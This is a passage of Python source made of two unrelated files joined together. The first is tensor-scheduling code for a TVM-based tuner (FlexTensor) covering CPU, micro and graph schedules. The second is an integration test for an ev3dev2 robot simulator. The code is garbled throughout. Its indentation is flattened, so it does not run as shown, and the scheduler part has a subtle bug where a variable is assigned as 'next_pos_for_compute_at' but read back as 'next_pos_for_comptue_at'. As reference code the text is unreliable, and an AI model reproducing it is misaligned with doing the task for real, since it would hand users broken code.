beg = end
fused_parts.append(tmp_part)
fused_part_extents.append(tmp_extents)
fused_part_idx.append(tmp_idx)
# for op state
loop_lst.extend(tmp_part)
loop_idx.extend([x + base_id for x in tmp_idx])
base_id += len(tmp_part)
else:
fused_parts = reorder_parts
fused_part_extents = reorder_part_extents
fused_part_idx = [list(range(len(x))) for x in reorder_parts]
# for op state
loop_lst = reorder_lst
loop_idx = list(range(len(reorder_lst)))
# record op state
op_state.loop_lst = loop_lst
op_state.loop_idx = loop_idx
# parallel
fused = s[op].fuse(*fused_parts[0])
s[op].parallel(fused)
# compute at
num_parts = len(fused_parts)
if num_parts == 1:
local_pos = fused
elif num_parts == 2:
local_pos = fused_parts[num_parts - 1][0]
else:
local_pos = fused_parts[num_parts - 2][-1]
if "local_pos" in config and len(config["local_pos"]) > 0:
local_at_part = config["local_pos"][0][0]
local_at_idx = config["local_pos"][0][1]
# index changed because of fusion
cur_idx = fused_part_idx[local_at_part][local_at_idx]
local_pos = fused_parts[local_at_part][cur_idx]
# always compute at here
s[write_cache].compute_at(s[op], local_pos)
# reduce_split
reduced_axes = s[write_cache].op.reduce_axis
splited_reduced_axes = []
if "reduce" in config and len(config["reduce"]) > 0:
# to align each axis
assert_print(len(config["reduce"]) == len(reduced_axes), "align reduce failed")
for axis, nparts in zip(reduced_axes, config["reduce"]):
tmp_buffer = []
for count in range(len(nparts) - 1):
outer, axis = s[write_cache].split(axis, nparts=nparts[count])
tmp_buffer.append(outer)
tmp_buffer.append(axis)
splited_reduced_axes.append(tmp_buffer)
else:
for axis in reduced_axes:
splited_reduced_axes.append([axis])
# if has reduce axes
if len(splited_reduced_axes) > 0:
# always reorder here
reduced_nonfuse_lsts = []
reorder_lst = []
length = len(splited_reduced_axes[0])
# leave the last part
for count in range(length - 1):
tmp_buffer = [x[count] for x in splited_reduced_axes]
reduced_nonfuse_lsts.append(tmp_buffer)
reorder_lst.extend(tmp_buffer)
# the last part
last_part = [x[length - 1] for x in splited_reduced_axes]
spatial_remainder = s[write_cache].op.axis
# change the order of reduce axes and spatial axes
if "reorder" in config and len(config["reorder"]) > 0:
pos = config["reorder"][0][0]
assert pos < len(spatial_remainder)
tmp_buffer = []
count = len(spatial_remainder) - 1
while count > pos:
tmp_buffer.append(spatial_remainder[count])
count -= 1
p = pos
q = len(last_part) - 1
while p >= 0 and q >= 0:
tmp_buffer.append(spatial_remainder[p])
tmp_buffer.append(last_part[q])
p -= 1
q -= 1
while p >= 0:
tmp_buffer.append(spatial_remainder[p])
p -= 1
while q >= 0:
tmp_buffer.append(last_part[q])
q -= 1
tmp_buffer = list(reversed(tmp_buffer))
reorder_lst.extend(tmp_buffer)
else:
reorder_lst.extend(last_part)
reorder_lst.extend(spatial_remainder)
s[write_cache].reorder(*reorder_lst)
# unroll
if "unroll" in config and len(config["unroll"]) > 0:
step = config["unroll"][0][0]
explicit = config["unroll"][0][1]
s[op].pragma(kernel_scope, 'auto_unroll_max_step', step)
s[op].pragma(kernel_scope, 'unroll_explicit', explicit)
def _cpu_schedule_simple(s, op, op_state):
# always cache write here
# if op.num_outputs > 1:
# raise RuntimeWarning("Too many outputs in one operation!")
write_cache = s.cache_write(op.output(0), "global")
# spatial split
spatial_axes = s[op].op.axis
splited_spatial_axes = []
if "spatial" in config and len(config["spatial"]) > 0:
# to align each axis
assert_print(len(config["spatial"]) == len(spatial_axes), "align failed")
for axis, nparts in zip(spatial_axes, config["spatial"]):
nfactors = [1]
count = len(nparts) - 1
while count >= 0:
nfactors.append(nparts[count] * nfactors[-1])
count -= 1
tmp_buffer = []
num_factors = len(nfactors)
for i in range(num_factors - 2):
factor = nfactors[num_factors - 2 - i]
part = nparts[i]
if factor == 1:
tmp_buffer.append(axis)
axis = None
elif part == 1:
tmp_buffer.append(None)
else:
outer, axis = s[op].split(axis, factor=factor)
tmp_buffer.append(outer)
tmp_buffer.append(axis)
splited_spatial_axes.append(tmp_buffer)
else:
for axis in spatial_axes:
splited_spatial_axes.append([axis])
assert_print(len(splited_spatial_axes) > 0, "empty spatial axes") # must be non-empty
# always reorder and fuse here
            # this part actually assumes "spatial" is present in config,
            # which could be avoided
spatial_fuse_lsts = []
spatial_fuse_extents = []
reorder_lst = []
fused_spatial_axes = []
spatial_split_num_parts = len(splited_spatial_axes[0])
for count in range(spatial_split_num_parts):
tmp_buffer = [x[count] for x in splited_spatial_axes]
tmp_extent = reduce(lambda a, b: a * b, [x[count] for x in config["spatial"]])
spatial_fuse_lsts.append(tmp_buffer)
spatial_fuse_extents.append(tmp_extent)
reorder_lst.extend(tmp_buffer)
reorder_lst_without_none = list(filter(lambda x: x is not None, reorder_lst))
# print("reorder op", reorder_lst_without_none)
s[op].reorder(*reorder_lst_without_none)
for fuse_lst in spatial_fuse_lsts[:1]:
tmp_buffer = list(filter(lambda x: x is not None, fuse_lst))
# print("fuse op", tmp_buffer)
fused = s[op].fuse(*tmp_buffer)
fused_spatial_axes.append(fused)
kernel_scope = fused_spatial_axes[0]
if len(spatial_fuse_lsts) > 1:
count = 0
while config["spatial"][count][1] == 1:
count += 1
                next_pos_for_compute_at = spatial_fuse_lsts[1][count]
            else:
                next_pos_for_compute_at = kernel_scope
# always parallel here
s[op].parallel(kernel_scope)
# vectorize
if len(spatial_fuse_lsts) == 2:
count = len(spatial_fuse_lsts[1]) - 1
while count >= 1:
if spatial_fuse_lsts[1][count] is not None and config["spatial"][1][count] > 1:
# print("vectorize op", spatial_fuse_lsts[1][count])
s[op].vectorize(spatial_fuse_lsts[1][count])
break
count -= 1
elif len(spatial_fuse_lsts) > 2:
count = len(spatial_fuse_lsts[-1]) - 1
while count >= 0:
if spatial_fuse_lsts[-1][count] is not None and config["spatial"][count][-1] > 1:
# print("vectorize op", spatial_fuse_lsts[-1][count])
s[op].vectorize(spatial_fuse_lsts[-1][count])
break
count -= 1
# always compute at here
# print("compute at", next_pos_for_comptue_at)
s[write_cache].compute_at(s[op], next_pos_for_comptue_at)
# spatial_split for write cache
spatial_axes = s[write_cache].op.axis
num_spatial_axes = len(spatial_axes)
splited_spatial_axes = []
if "spatial" in config and len(config["spatial"]) > 0:
# to align each axis
assert_print(len(config["spatial"]) == len(spatial_axes), "align failed")
for axis, nparts in zip(spatial_axes, config["spatial"]):
nfactors = [1]
count = len(nparts) - 1
while count >= 0:
nfactors.append(nparts[count] * nfactors[-1])
count -= 1
tmp_buffer = []
num_factors = len(nfactors)
for i in range(num_factors - 2):
factor = nfactors[num_factors - 2 - i]
part = nparts[i]
if factor == 1:
tmp_buffer.append(axis)
axis = None
elif part == 1:
tmp_buffer.append(None)
else:
outer, axis = s[write_cache].split(axis, factor=factor)
tmp_buffer.append(outer)
tmp_buffer.append(axis)
splited_spatial_axes.append(tmp_buffer)
else:
for axis in spatial_axes:
splited_spatial_axes.append([axis])
assert_print(len(splited_spatial_axes) > 0, "empty spatial axes") # must be non-empty
# reduce_split for write cache
reduced_axes = s[write_cache].op.reduce_axis
num_reduce_axes = len(reduced_axes)
splited_reduced_axes = []
if "reduce" in config and len(config["reduce"]) > 0:
# to align each axis
assert_print(len(config["reduce"]) == len(reduced_axes), "align reduce failed")
for axis, nparts in zip(reduced_axes, config["reduce"]):
nfactors = [1]
count = len(nparts) - 1
while count >= 0:
nfactors.append(nparts[count] * nfactors[-1])
count -= 1
tmp_buffer = []
num_factors = len(nfactors)
for i in range(num_factors - 2):
factor = nfactors[num_factors - 2 - i]
part = nparts[i]
if factor == 1:
tmp_buffer.append(axis)
axis = None
elif part == 1:
tmp_buffer.append(None)
else:
outer, axis = s[write_cache].split(axis, factor=factor)
tmp_buffer.append(outer)
tmp_buffer.append(axis)
splited_reduced_axes.append(tmp_buffer)
else:
for axis in reduced_axes:
splited_reduced_axes.append([axis])
# for easy align
reduce_split_num_parts = len(splited_reduced_axes[0])
assert reduce_split_num_parts == spatial_split_num_parts
# reorder hybrid for spatial and reduce
hybrid_axes = splited_spatial_axes + splited_reduced_axes
hybrid_fuse_lsts = []
hybrid_reorder_lst = []
for count in range(spatial_split_num_parts):
tmp_buffer = [x[count] for x in hybrid_axes]
hybrid_fuse_lsts.append(tmp_buffer)
hybrid_reorder_lst.extend(tmp_buffer)
if len(hybrid_fuse_lsts) > 1:
last_parts = hybrid_reorder_lst[-num_spatial_axes - num_reduce_axes:]
hybrid_reorder_lst = hybrid_reorder_lst[:-num_spatial_axes - num_reduce_axes]
tmp_buffer = last_parts[-num_reduce_axes:]
tmp_buffer.extend(last_parts[:-num_reduce_axes])
hybrid_reorder_lst.extend(tmp_buffer)
hybrid_reorder_lst_without_none = list(filter(lambda x: x is not None, hybrid_reorder_lst))
# print("reorder cache write", hybrid_reorder_lst_without_none)
s[write_cache].reorder(*hybrid_reorder_lst_without_none)
# fuse without reduce axes
# assert len(hybrid_fuse_lsts) > 0
# s[write_cache].fuse(*hybrid_fuse_lsts[0][:-num_reduce_axes])
# unroll and vectorize without reduce axes
if len(hybrid_fuse_lsts) > 1:
rcount = num_spatial_axes - 1
while config["spatial"][rcount][-1] == 1:
rcount -= 1
if rcount >= 0:
# print("vectorize cache write", hybrid_fuse_lsts[-1][rcount])
s[write_cache].vectorize(hybrid_fuse_lsts[-1][rcount])
for count in range(rcount):
if config["spatial"][count][-1] > 1:
# print("unroll cache write", hybrid_fuse_lsts[-1][count])
s[write_cache].unroll(hybrid_fuse_lsts[-1][count])
if len(hybrid_fuse_lsts) > 2:
for count in range(num_spatial_axes):
if config["spatial"][count][-2] > 1:
# print("unroll cache write", hybrid_fuse_lsts[-2][count])
s[write_cache].unroll(hybrid_fuse_lsts[-2][count])
# for count in range(num_reduce_axes):
# if config["reduce"][count][-2] > 1:
# print("unroll cache write", hybrid_fuse_lsts[-2][count + num_spatial_axes])
# s[write_cache].unroll(hybrid_fuse_lsts[-2][count + num_spatial_axes])
def _micro_schedule_simple(s, op, op_state):
# prepare extents
sp_extents = [to_int(x.dom.extent) for x in op.axis]
if hasattr(op, "reduce_axis"):
re_extents = [to_int(x.dom.extent) for x in op.reduce_axis]
else:
re_extents = []
INTRIN_TABLE = get_intrin_table()
if "intrin" in config:
target, ind, slist, rlist = config["intrin"][0]
intrin = INTRIN_TABLE[target][ind]
else:
intrin = None
s_list = []
r_list = []
sp_factors = []
re_factors = []
# spatial split
if "spatial" in config:
sub_sp_axis_list = []
for axis, f_list in zip(s[op].op.axis, config["spatial"]):
split_list = []
for factor in f_list[:-1]:
outer, axis = s[op].split(axis, nparts=factor)
split_list.append(outer)
sp_factors.append(f_list[-1])
split_list.append(axis)
sub_sp_axis_list.append(split_list)
else:
sub_sp_axis_list = [[axis] for axis in s[op].op.axis]
sp_factors = sp_extents
# reduce split
if "reduce" in config and hasattr(op, "reduce_axis"):
sub_re_axis_list = []
for axis, f_list in zip(s[op].op.reduce_axis, config["reduce"]):
split_list = []
for factor in f_list[:-1]:
outer, axis = s[op].split(axis, nparts=factor)
split_list.append(outer)
re_factors.append(f_list[-1])
split_list.append(axis)
sub_re_axis_list.append(split_list)
elif hasattr(op, "reduce_axis"):
sub_re_axis_list = [[axis] for axis in s[op].op.reduce_axis]
re_factors = re_extents
else:
sub_re_axis_list = []
# match intrinsic
def rearrange(lst):
return list(zip(*lst))
sub_sp_axis_list = rearrange(sub_sp_axis_list)
sub_re_axis_list = rearrange(sub_re_axis_list)
num_sp = len(sub_sp_axis_list) - 1
num_re = len(sub_re_axis_list) - 1
# inner-most
inner_most = [sub_sp_axis_list[num_sp]]
if num_re >= 0:
inner_most.append(sub_re_axis_list[num_re])
# do intrinsic
if intrin is not None:
visit_sp = [False for x in inner_most[0]]
if num_re >= 0:
visit_re = [False for x in inner_most[1]]
else:
visit_re = []
intrin_sp_list = []
intrin_re_list = []
intrin_sp_extents = []
intrin_re_extents = []
intrin_sp_factors = []
intrin_re_factors = []
for ind in slist:
intrin_sp_list.append(inner_most[0][ind])
visit_sp[ind] = True
intrin_sp_extents.append(sp_extents[ind])
intrin_sp_factors.append(sp_factors[ind])
for ind in rlist:
intrin_re_list.append(inner_most[1][ind])
visit_re[ind] = True
intrin_re_extents.append(re_extents[ind])
intrin_re_factors.append(re_factors[ind])
left_sp_axis_list = []
for i, val in enumerate(visit_sp):
if not val:
left_sp_axis_list.append(inner_most[0][i])
left_re_axis_list = []
for i, val in enumerate(visit_re):
if not val:
left_re_axis_list.append(inner_most[1][i])
# reorder
# spatial must before reduce
to_reorder = []
for parts in sub_sp_axis_list[:-1]:
to_reorder.extend(parts)
to_reorder.extend(left_sp_axis_list)
for parts in sub_re_axis_list[:-1]:
to_reorder.extend(parts)
to_reorder.extend(left_re_axis_list)
to_reorder.extend(intrin_sp_list)
to_reorder.extend(intrin_re_list)
s[op].reorder(*to_reorder)
# tensorize
intrinsic = intrin.intrin(*(
intrin_sp_extents +
intrin_re_extents +
intrin_sp_factors +
intrin_re_factors +
intrin_sp_list +
intrin_re_list))
s[op].tensorize(intrin_sp_list[0], intrinsic)
# do fence
s[op].pragma(to_reorder[0], "epilogue", "do_fence")
else:
to_reorder = []
while num_sp >= 0 and num_re >= 0:
to_reorder.append(sub_sp_axis_list[num_sp] + sub_re_axis_list[num_re])
num_sp -= 1
num_re -= 1
while num_sp >= 0:
to_reorder.append(sub_sp_axis_list[num_sp])
num_sp -= 1
while num_re >= 0:
to_reorder.append(sub_re_axis_list[num_re])
num_re -= 1
to_reorder = reduce(lambda x, y: x + y, reversed(to_reorder), [])
s[op].reorder(*to_reorder)
def _micro_schedule_split_reorder(s, op, op_state):
sp_exts = [int(x.dom.extent) for x in op.axis]
re_exts = [int(x.dom.extent) for x in op.reduce_axis]
intrin = None
sp_intrin_idx_lst, re_intrin_idx_lst = [], []
INTRIN_TABLE = get_intrin_table()
if "intrin" in config:
target, ind, sp_intrin_idx_lst, re_intrin_idx_lst = config["intrin"][0]
intrin = INTRIN_TABLE[target][ind]
def gen_split(cfg_key, axes):
sub_axes = []
inner_exts = []
if cfg_key in config and len(config[cfg_key]) > 0:
for i, (axis, factors) in enumerate(zip(axes, config[cfg_key])):
splits = []
for f in factors[:-1]:
outer, axis = s[op].split(axis, nparts=f)
splits.append(outer)
splits.append(axis)
inner_exts.append(factors[-1])
sub_axes.append(splits)
else:
sub_axes = [[x] for x in axes]
inner_exts = [[x.dom.extent] for x in axes]
return sub_axes, inner_exts
def partition(sub_axes, intrin_idx_lst):
outer_axes, intrin_axes = [], []
for i, axes in enumerate(sub_axes):
if i in intrin_idx_lst:
outer_axes.extend(axes[:-1])
intrin_axes.append(axes[-1])
else:
outer_axes.extend(axes)
return outer_axes, intrin_axes
sp_sub_axes, sp_inner_exts = gen_split("spatial", s[op].op.axis)
re_sub_axes, re_inner_exts = gen_split("reduce", s[op].op.reduce_axis)
sp_outer_axes, sp_intrin_axes = partition(sp_sub_axes, sp_intrin_idx_lst)
re_outer_axes, re_intrin_axes = partition(re_sub_axes, re_intrin_idx_lst)
outer_axes = sp_outer_axes + re_outer_axes
intrin_axes = sp_intrin_axes + re_intrin_axes
if "reorder" in config and len(config["reorder"]) > 0:
shift_step = config["reorder"][0][0]
assert shift_step < len(outer_axes)
outer_axes = shift(sp_outer_axes, re_outer_axes, shift_step)
s[op].reorder(*outer_axes, *intrin_axes)
intrinsic = intrin.intrin(
*[sp_exts[i] for i in sp_intrin_idx_lst],
*[re_exts[i] for i in re_intrin_idx_lst],
*[sp_inner_exts[i] for i in sp_intrin_idx_lst],
*[re_inner_exts[i] for i in re_intrin_idx_lst],
*[sp_outer_axes[i] for i in sp_intrin_idx_lst],
*[re_outer_axes[i] for i in re_intrin_idx_lst]
)
s[op].tensorize(intrin_axes[0], intrinsic)
s[op].pragma(outer_axes[0], "epilogue", "do_fence")
if target == "cuda":
# if hint == "split_fuse":
# print(hint)
# return _cuda_schedule_split_fuse
# elif hint == "fuse_split":
# print(hint)
# return _cuda_schedule_fuse_split
# else:
# raise RuntimeError("Unknown hint: %s" % hint)
return _cuda_schedule_split_reorder_fuse
elif target == "llvm":
return _cpu_schedule_simple
elif target == "micro":
# return _micro_schedule_simple
return _micro_schedule_split_reorder
else:
raise RuntimeError("Currently no support for target %s" % target)
class Rewriter(object):
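    """Rewrite a tuned conv2d task on CPU into an NCHWc layout, adjusting the
    graph config and the spatial/reduce split factors accordingly.
    """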
def __init__(self, configs):
self.graph_config = configs.graph_config
self.op_config_lst = configs.op_config_lst
def rewrite(self, task):
"""
this is a hard code manner,
we don't know how to generalize this change
because it even need compute rewrite and schedule rewrite
"""
assert task.target == "llvm", "Only rewrite for CPU"
assert task.category == "conv2d"
# schedule rewrite
import copy
new_graph_config = copy.deepcopy(self.graph_config)
new_op_config_lst = copy.deepcopy(self.op_config_lst)
# must compute inline as original config may split channel differently
new_graph_config["inline"] = [[1, 0]]
# fetch conv config
conv_config = self.op_config_lst[1]
new_config = new_op_config_lst[1]
# change out_channel config
vlen1 = conv_config["reduce"][0][-1]
vlen2 = conv_config["spatial"][1][-1]
new_config["spatial"].append([1] * len(new_config["spatial"][0]))
new_config["spatial"][-1][-1] = vlen2
new_config["spatial"][1][-1] = 1
new_config["reduce"][0][-1] = 1
new_config["reduce"].insert(1, [1] * len(new_config["reduce"][0]))
new_config["reduce"][1][-1] = vlen1
# compute rewrite
from flextensor.task import conv2d_nchwc_layout
kwargs = {"vlen1": vlen1, "vlen2": vlen2}
ops, bufs = conv2d_nchwc_layout(*task.args, **kwargs)
return ops, bufs, new_graph_config, new_op_config_lst
class GraphScheduler(Scheduler):
def __init__(self, task_key, space, decay=0.7, parallel=10, timeout=4.0, trial=100, number=1, early_stop=30,
rpc_info=None, rewrite=False):
super(GraphScheduler, self).__init__("graph", task_key, space, parallel, timeout, trial, number, early_stop,
rpc_info, rewrite=rewrite)
def schedule(self, configs, method="searching", use_model=False, perf_path=None):
if perf_path is not None:
self.walker_group.model_path = perf_path
if method == "searching":
return self._searching_schedule(configs, ["inline", "merge"], use_model=use_model)
elif method == "q":
return self._q_schedule(configs, ["inline", "merge"], use_model=use_model)
elif method == "random":
return self._random_schedule(configs, ["inline", "merge"], use_model=use_model)
else:
raise RuntimeError("Currently no support for method %s" % method)
def parallel_evaluate(self, configs, graph_configs, number=1):
return self._parallel_evaluate(configs, graph_configs, mode="graph", number=number)
@staticmethod
def generate_graph_schedule(config, phase="inline"):
def _inline_schedule(s, op_lst, op_states):
if "inline" in config and len(config["inline"]) > 0:
entity = config["inline"][0]
for count in range(len(op_lst)):
if entity[count]:
s[op_lst[count]].compute_inline()
op_states[count].inline = True
def _at_schedule(s, op_lst, op_states):
return
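            # NOTE: the early return above disables compute_at; the code below
            # never executes.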
if "merge" in config and len(config["merge"]) > 0:
entity = config["merge"][0]
for count in range(len(op_lst)):
if entity[count] >= 0:
num_consumers = len(op_states[count].consumer_lst)
if num_consumers != 1 or op_states[count].inline:
continue
else:
consumer_id = op_states[count].consumer_lst[0]
consumer_state = op_states[consumer_id]
if consumer_state.inline:
continue # do not compute at inlined ops
consumer_loop_idx = consumer_state.loop_idx
at_pos = consumer_state.loop_lst[consumer_loop_idx[entity[count]]]
s[op_lst[count]].compute_at(s[op_lst[consumer_id]], at_pos)
op_states[count].compute_at = True
if phase == "inline":
return _inline_schedule
elif phase == "at":
return _at_schedule
else:
raise RuntimeError("Currently no support for phase %s" % phase)
class SerialResult(object):
def __init__(self, res):
self.res = res
def get(self, timeout=1):
return self.res
class Result(object):
def __init__(self, p, q):
self.p = p
self.q = q
def get(self, timeout=1):
# beg = time.time()
# while time.time() - beg < timeout:
# if self.q.empty():
# time.sleep(.1)
# else:
# break
try:
# print("getting...")
# while self.q.empty():
# pass
# print("queue is empty? ", self.q.empty())
res = self.q.get(block=True, timeout=timeout)
# print("done")
# while not self.q.empty():
# _ = self.q.get(block=True)
except Exception as e:
# print(e.__class__)
res = RuntimeError(str(e))
if self.p.is_alive():
kill_child_processes(self.p.pid)
self.p.terminate()
self.p.join()
self.q.close()
# print("queue joining...")
self.q.join_thread()
# print("queue joined")
del self.p
del self.q
return res
class OpState(object):
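    # Per-operator bookkeeping used during scheduling: whether the op was inlined
    # or computed at a consumer, its loop axes/indices, and its consumer ops.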
def __init__(self):
self.inline = False
self.loop_lst = []
self.loop_idx = []
self.compute_at = False
self.consumer_lst = []
def schedule(task_key, slevel=4, rlevel=3, op_trial=50, graph_trial=10, op_stop=15, graph_stop=5,
number=1, timeout=5.0, parallel=8, method="searching", re_evalutate_number=10, warm_up_epoch=20, warm_up_number=20, **kwargs,):
"""Schedule a task
perform sequential schedule
"""
task = TASK_TABLE[task_key]
func = task.func
args = task.args
ops, bufs = func(*args)
# sort the ops, so that we can distinguish each op
op_lst, down_graph = flatten_graph(ops)
# state of ops
op_states = [OpState() for _ in op_lst]
for count_op, op in enumerate(op_lst):
consumer_lst = []
for count_output in range(op.num_outputs):
if op.output(count_output) in down_graph:
consumer_lst.extend(down_graph[op.output(count_output)])
op_states[count_op].consumer_lst = list(set(consumer_lst))
if "trials" in kwargs:
assert_print(len(kwargs["trials"]) == len(op_lst), str(len(op_lst)))
force_trials = kwargs["trials"]
else:
force_trials = [op_trial for i in range(len(op_lst))]
op_perf_model_path_lst = [None for i in range(len(op_lst))]
if "op_perf_model_path" in kwargs:
for (op_pos, path) in kwargs["op_perf_model_path"]:
op_perf_model_path_lst[op_pos] = path
graph_perf_model_path = None
if "graph_perf_model_path" in kwargs:
graph_perf_model_path = kwargs["graph_perf_model_path"]
force_inline = False
if "force_inline" in kwargs:
force_inline = kwargs["force_inline"]
if "rewrite" in kwargs:
rewrite = True
# must force_inline
force_inline = True
else:
rewrite = False
rpc_info = None
if "rpc_info" in kwargs:
rpc_info = kwargs["rpc_info"]
model_measurer = None
if "model_measurer" in kwargs:
model_measurer = kwargs["model_measurer"]
##################################################
# first generate graph space
if task.target == "cuda" or task.target == "llvm":
schedule_graph = True
graph_space = generate_space_inter_op(
op_lst, down_graph, force_inline=force_inline, special_space=task.special_space)
elif task.target == "micro":
schedule_graph = False
graph_space = generate_empty_space_inter_op()
else:
raise RuntimeError("Currently no support for target %s" % task.target)
graph_space_size = len(graph_space)
#print("graph space size", graph_space_size)
total_size = graph_space_size
##################################################
    # intra-operation schedule decisions
op_space_lst = []
if force_inline and "inline" in graph_space.subspaces:
configs = Config([], {"inline": [graph_space.subspaces["inline"].static_entities[0]]})
else:
configs = Config([], None)
for pos, op in enumerate(op_lst):
if task.target == "cuda":
space = generate_space_intra_op(op, down_graph, slevel=slevel, rlevel=rlevel, groups=3)
elif task.target == "llvm":
rslevel = max(slevel, rlevel)
space = generate_space_intra_op(op, down_graph, slevel=rslevel, rlevel=rslevel,
unroll_policy="off", fuse_policy="off",
reorder_policy="off")
elif task.target == "micro":
space = generate_op_space_with_intrin(op, rpc_info.target)
else:
raise RuntimeError("Currently no support for target %s" % task.target)
total_size *= len(space)
#print("op", pos, "space size:", len(space))
op_space_lst.append(space)
op_scheduler = OpScheduler(
task_key,
pos,
space,
parallel=parallel,
timeout=timeout,
trial=force_trials[pos],
number=number,
early_stop=op_stop,
rpc_info=rpc_info,
rewrite=rewrite,
model_measurer=model_measurer,
re_evalutate_number=re_evalutate_number,
warm_up_epoch=warm_up_epoch,
warm_up_number=warm_up_number
)
# print("###########################################")
# print("Scheduling", op)
use_model = False if op_perf_model_path_lst[pos] is None else True
perf_path = op_perf_model_path_lst[pos]
if force_inline and "inline" in graph_space.subspaces \
and graph_space.subspaces["inline"].able_inline(pos):
op_config = {}
else:
op_config = op_scheduler.schedule(
configs,
method=method,
use_model=use_model,
perf_path=perf_path,
)
configs.op_config_lst.append(op_config)
#print("space size", total_size)
#################################################
# inter operations schedule decisions
if schedule_graph:
graph_scheduler = GraphScheduler(
task_key,
graph_space,
parallel=parallel,
timeout=timeout,
trial=graph_trial,
number=number,
early_stop=graph_stop,
rpc_info=rpc_info,
rewrite=rewrite
)
use_model = False if graph_perf_model_path is None else True
if len(graph_space) > 1:
graph_config = graph_scheduler.schedule(
configs, method=method, use_model=use_model, perf_path=graph_perf_model_path)
else:
graph_config = {}
else:
graph_config = {}
#################################################
# combine the configs
configs = Config(configs.op_config_lst, graph_config)
    if (not configs.op_config_lst) or (not configs.op_config_lst[0]["intrin"]):  # cannot find a schedule for the hardware design point
print("Cannot find valid schedules")
return None, None, None
#################################################
# final schedule
# s = tvm.create_schedule(ops)
# # perform inter operator schedule
# graph_template = GraphScheduler.generate_graph_schedule(configs.graph_config, phase="inline")
# graph_template(s, op_lst, op_states)
# # perform intra-operator schedule
# for count_op, (op, op_state, op_config) in enumerate(zip(op_lst, op_states, configs.op_config_lst)):
# if not op_state.inline:
# op_template = OpScheduler.generate_op_schedule(task.target, op_config)
# op_template(s, op, op_states[count_op])
# # perform inter operations schedule again for compute at
# if graph_config is not None:
# graph_template = GraphScheduler.generate_graph_schedule(graph_config, phase="at")
# graph_template(s, op_lst, op_states)
s, bufs = schedule_with_config(task_key, configs, rewrite=rewrite)
return s, bufs, configs
def schedule_with_config(task_key, configs, op_pos=None, rewrite=False):
"""Schedule a task with given configs
perform sequential schedule
"""
task = TASK_TABLE[task_key]
rewriter = Rewriter(configs)
if rewrite:
ops, bufs, new_graph_config, new_op_config_lst = rewriter.rewrite(task)
configs = Config(new_op_config_lst, new_graph_config)
else:
func = task.func
args = task.args
ops, bufs = func(*args)
s, bufs = schedule_with_config_ops(ops, bufs, configs, op_pos=op_pos, target=task.target)
return s, bufs
def schedule_with_config_ops(ops, bufs, configs, op_pos=None, target="llvm"):
"""Schedule a task with given configs
perform sequential schedule
"""
# sort the ops, so that we can distinguish each op
op_lst, down_graph = flatten_graph(ops)
# state of ops
op_states = [OpState() for op in op_lst]
for count_op, op in enumerate(op_lst):
consumer_lst = []
for count_output in range(op.num_outputs):
if op.output(count_output) in down_graph:
consumer_lst.extend(down_graph[op.output(count_output)])
op_states[count_op].consumer_lst = list(set(consumer_lst))
op_config_lst = configs.op_config_lst
if op_pos is not None:
assert_print(isinstance(op_pos, int), "op_pos should be int")
assert_print(op_pos < len(op_lst) and op_pos < len(op_config_lst), "op_pos too big")
loop_length = op_pos + 1
s = tvm.create_schedule(op_lst[op_pos])
else:
assert_print(len(op_config_lst) <= len(op_lst), "config length exceed op_lst")
loop_length = len(op_config_lst)
s = tvm.create_schedule(ops)
###################################################
# perform inter operations schedule first for inline
graph_config = configs.graph_config
if graph_config is not None:
graph_template = GraphScheduler.generate_graph_schedule(graph_config, phase="inline")
graph_template(s, op_lst, op_states)
###################################################
# perform intra operations schedule
for i in range(loop_length):
# mask inlined ops
if not op_states[i].inline:
op = op_lst[i]
config = op_config_lst[i]
template = OpScheduler.generate_op_schedule(target, config)
template(s, op, op_states[i])
###################################################
# perform inter operations schedule again for compute at
if graph_config is not None:
graph_template = GraphScheduler.generate_graph_schedule(graph_config, phase="at")
graph_template(s, op_lst, op_states)
return s, bufs
def schedule_ops_with_config(s, op_lst, configs, target):
"""
Schedule op list with given configs
    This assumes a previous graph optimization,
    so there is no need to retrieve the graph list
    nor perform compute_at.
"""
# state of ops
op_states = [OpState() for op in op_lst]
op_config_lst = configs.op_config_lst
loop_length = len(op_config_lst)
###################################################
# perform inter operations schedule first for inline
graph_config = configs.graph_config
if graph_config is not None:
graph_template = GraphScheduler.generate_graph_schedule(graph_config, phase="inline")
graph_template(s, op_lst, op_states)
###################################################
# perform intra operations schedule
for i in range(loop_length):
# mask inlined ops
if not op_states[i].inline:
op = op_lst[i]
config = op_config_lst[i]
template = OpScheduler.generate_op_schedule(target, config)
template(s, op, op_states[i])
return s
|
sensor_integration_test.py
|
import os
import sys
import threading
import unittest
from multiprocessing import Process
from time import sleep
from unittest.mock import patch
from ev3dev2.sensor.lego import UltrasonicSensor, ColorSensor, TouchSensor
from ev3dev2.unit import STUD_MM
from ev3dev2.wheel import EV3EducationSetTire
from ev3dev2.motor import OUTPUT_A, OUTPUT_D, MoveDifferential, MoveTank, SpeedPercent, follow_for_ms
from ev3dev2._platform.ev3 import INPUT_1, INPUT_2, INPUT_3, INPUT_4
from ev3dev2simulator import __main__
import ev3dev2simulator.connection.ClientSocket as cs
class TestConfig(unittest.TestCase):
def test_color_and_us_sensor_downwards(self):
test_args = ["program", "-t", "config_large"]
with patch.object(sys, 'argv', test_args):
sim = Process(target=__main__.main, daemon=True)
sim.start()
cs.client_socket = None
sleep(5)
clm = ColorSensor(INPUT_2)
usb = UltrasonicSensor(INPUT_4)
usb.mode = "US-DIST-CM"
tank_drive = MoveDifferential(OUTPUT_A, OUTPUT_D, EV3EducationSetTire, 15 * STUD_MM)
self.assertEqual(clm.color, 1)
tank_drive.on_for_rotations(0, -55, 1)
tank_drive.on_for_rotations(10, 0, 0.2)
tank_drive.stop()
self.assertEqual(clm.color, 5)
tank_drive.turn_left(30, -40)
self.assertEqual(usb.value(), 20.0)
tank_drive.turn_left(30, 120)
self.assertEqual(usb.value(), 2550.0)
cs.client_socket.client.close()
sim.terminate()
def test_touch_and_us_sensor_forward(self):
test_args = ["program", "-t", "config_small"]
with patch.object(sys, 'argv', test_args):
sim = Process(target=__main__.main, daemon=True)
sim.start()
cs.client_socket = None
sleep(5)
ts1 = TouchSensor(INPUT_1)
usf = UltrasonicSensor(INPUT_3)
usf.mode = "US-DIST-CM"
tank_drive = MoveDifferential(OUTPUT_A, OUTPUT_D, EV3EducationSetTire, 15 * STUD_MM)
tank_drive.turn_right(30, 90)
self.assertEqual(ts1.is_pressed, 0)
sleep(0.2)
self.assertAlmostEqual(usf.value(), 810, delta=20)
val = usf.value()
print(val)
tank_drive.on_for_distance(50, 600)
self.assertAlmostEqual(val - 600, usf.value(), delta=20)
self.assertEqual(False, ts1.is_pressed)
sleep(3)
tank_drive.on_for_rotations(20, 0, 0.3)
self.assertEqual(True, ts1.is_pressed)
